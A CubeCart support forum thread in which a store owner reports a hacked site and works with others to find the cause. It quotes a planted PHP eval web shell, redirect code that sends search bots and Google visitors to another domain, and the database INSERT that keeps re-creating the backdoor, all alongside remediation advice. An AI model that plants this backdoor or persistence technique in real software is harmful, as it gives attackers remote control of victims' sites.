my Cubecart site hacked

[jpayam]

Hello,

I use last cubecart.i see i A php file (snippet_892d667b445c9ebb6888107b8124a8.php) on /includes/extra directory which  include the below code:

<?php eval($_REQUEST["H6GrD"]);?>

this file recreate automatically  again and again after i delete it !!! 

this code adding below code to my index.php file.

if (preg_match("#(google|googlebot|slurp@inktomi|yahoo! slurp|msnbot)#si", $_SERVER['HTTP_USER_AGENT'])) {
header("HTTP/1.1 301 Moved Permanently");
header("Location: http://www.reehair.com/");
exit;
}

if (preg_match("#(www\.google)#si",$_SERVER['HTTP_REFERER'])) {
header("HTTP/1.1 301 Moved Permanently");
header("Location: http://www.reehair.com/");
exit;
}

 

now i am losing my seo links in search engines

thanks in advance for any help

 

[ayz1]

seems similar to this https://forums.cubecart.com/topic/50036-site-hijacked-by-modifying-controllerscontrollerincphp/

[havenswift-hosting]

This is exactly the same as that other report and is something we have seen on quite a few sites over the last 7 to 10 days. There is absolutely no point in simply deleting the code or replacing the file without discovering and plugging the mechanism through which they are gaining access as it is anautomated system that looks for and inserts this code.

This has been found to be caused mostly by having old and insecure versions of other software installed within the same hosting account such as forum (phpBB) or CMS (WordPress and Joomla) - if you have any other software installed alongside your CubeCart software you MUST always keep this right up to date as they have all had serious security issues disclosed and fixed over the recent months. Any software installed but not being used should be deleted and not just moved.  It can also be caused by insecure hosting where access is gained through another account with a vulnerability which is common with cheap shared hosting - if you value your CubeCart store then get decent hosting !

Ian

[jpayam]

We use a vps for this store, we have not any other scripts ,only one site with last cubecart script.
php ver is last 5.4 with suhosin enabled , all dangerous PHP functions disabled in php.ini file.
CSF is active , modesecurity with last COMODO rules is active.
calmAV and ConfigServer eXploit Scanner Scan  did not find any  Fingerprint matches
 

ConfigServer eXploit Scanner  only find a Suspicious matches:
'/home/XXXXXXXXXX/public_html/cache/75590.sql.1efdd7b03693b5f7a93ef2d228d5e98c.cache'
Regular expression match = [eval\(\$_REQUEST\[]

i empty cash folder and even disable the cash temporary but still problem not fixed

 

[havenswift-hosting]

Csf, cxs and mod_security woukdnt pick this type of file change up - you will need to analyse server logs to determine the method of access

Ian

[jpayam]

Yes, thanks

problem is from my database seems it infected before i install the modesecurity. as i install a fresh cubecart on another site and works without problem but when i import my database to new site i see the problem again (file snippet_892d667b445c9ebb6888107b8124a8.php) on /includes/extra directory )

how can i clean my database??

 i want to keep store setting products and customers and orders

[jpayam]

below code was in my database i just clean it and seems problem fixed

-- Dumping data for table `CubeCart_code_snippet`
--

LOCK TABLES `CubeCart_code_snippet` WRITE;
/*!40000 ALTER TABLE `CubeCart_code_snippet` DISABLE KEYS */;
INSERT INTO `CubeCart_code_snippet` VALUES (1,1,'snippetH6GrD','Snippet','controller.index','<?php eval($_REQUEST[\"H6GrD\"]);?>','','',3);
/*!40000 ALTER TABLE `CubeCart_code_snippet` ENABLE KEYS */;
UNLOCK TABLES;

[bsmither]

On your database server, would you happen to have it set to log to a General Log?

I can understand if it's not. Without some highly disciplined routine maintenance (or a cron job) to rotate out the logs, it could get quite large.

If you do have a General Log for the database server, you may be able to tell exactly when this record was first inserted into the database, and examine all the nearby database activity. Then correlate the date/time to the site's web server access log.

There might even be an entry in CubeCart's Staff Access Log for that date/time.

[jpayam]

I have not  log for mysql on server, 

my site hacked two times and every time i see below System Erros Log within the Cubecart panel.

Yesterday, 13:44 [Deprecated] /home/XXXXXXXXXXXXXXX/domains/XXXXXXXXXXX/public_html/includes/extra/snippet_892d667b445c9ebb6888107b8121a8.php(1) : eval()'d code(1) : eval()'d code:1 - Function set_magic_quotes_runtime() is deprecated